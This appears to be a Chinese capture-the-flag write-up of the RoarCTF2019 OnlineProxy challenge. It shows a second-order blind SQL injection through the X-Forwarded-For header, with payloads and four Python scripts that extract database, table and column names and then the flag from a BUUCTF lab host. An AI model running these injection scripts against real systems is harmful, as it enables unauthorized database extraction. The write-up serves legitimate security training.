[RoarCTF2019]OnlineProxy

[RoarCTF2019]OnlineProxy

这里发现通过修改X-FORWARDED-FOR的值注释部分的内容也随之改变

尝试盲注，上传命令时第一次为Current Ip发现并不能执行，再次上传Current Ip时上次的Current Ip变为Last Ip也没有执行，再次send即可正常执行命令

简单尝试使用盲注得到所有库名，这里可以看到该方法是没问题的

爆破库名：

0' or ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))>1 or '0

import requests

url = "http://node4.buuoj.cn:26869/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=6d033f15-65eb-4a27-a711-76514d4487d5",
	"X-Forwarded-For" : ""
}
result = ""
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
		head["X-Forwarded-For"] = "0' or ascii(substr((select group_concat(schema_name) from information_schema.schemata),{0},1))>{1} or '0".format(i,mid)
		html_0 = requests.post(url,headers = head)
		head["X-Forwarded-For"] = "0' or ascii(substr((select group_concat(schema_name) from information_schema.schemata),{0},1))>{1} or '0".format(i, mid+1)
		html_0 = requests.post(url, headers=head)
		html_0 = requests.post(url, headers=head)
		if "Last Ip: 1" in html_0.text:
			l= mid+1
		else:
			r=mid
		mid = (l+r)>>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)

爆破表名：

爆破表名：

0' or ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='F4l9_D4t4B45e')),1,1))>1 or '0

import requests

url = "http://node4.buuoj.cn:26869/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=6d033f15-65eb-4a27-a711-76514d4487d5",
	"X-Forwarded-For" : ""
}
result = ""
urls ="0' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
		head["X-Forwarded-For"] = urls.format(i,mid)
		html_0 = requests.post(url,headers = head)
		head["X-Forwarded-For"] = urls.format(i, mid+1)
		html_0 = requests.post(url, headers=head)
		html_0 = requests.post(url, headers=head)
		if "Last Ip: 1" in html_0.text:
			l= mid+1
		else:
			r=mid
		mid = (l+r)>>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)

查列名：

0' or ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F4l9_t4b1e')),1,1))>1 or '0

import requests

url = "http://node4.buuoj.cn:26869/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=6d033f15-65eb-4a27-a711-76514d4487d5",
	"X-Forwarded-For" : ""
}
result = ""
urls ="0' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
		head["X-Forwarded-For"] = urls.format(i,mid)
		html_0 = requests.post(url,headers = head)
		head["X-Forwarded-For"] = urls.format(i, mid+1)
		html_0 = requests.post(url, headers=head)
		html_0 = requests.post(url, headers=head)
		if "Last Ip: 1" in html_0.text:
			l= mid+1
		else:
			r=mid
		mid = (l+r)>>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)

查Flag

0' or ascii(substr((select(group_concat(F4l9_C01uMn))from(F4l9_D4t4B45e.F4l9_t4b1e)),1,1))>1 or '0

import requests

url = "http://node4.buuoj.cn:26869/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=6d033f15-65eb-4a27-a711-76514d4487d5",
	"X-Forwarded-For" : ""
}
result = ""
urls ="0' or ascii(substr((select F4l9_C01uMn from F4l9_D4t4B45e.F4l9_t4b1e limit 1,1),{0},1))>{1} or '0"
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
		head["X-Forwarded-For"] = urls.format(i,mid)
		html_0 = requests.post(url,headers = head)
		head["X-Forwarded-For"] = urls.format(i, mid+1)
		html_0 = requests.post(url, headers=head)
		html_0 = requests.post(url, headers=head)
		if "Last Ip: 1" in html_0.text:
			l= mid+1
		else:
			r=mid
		mid = (l+r)>>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)

参考链接：[BUUCTF–RoarCTF 2019]Online Proxy_onlineproxy ctf-CSDN博客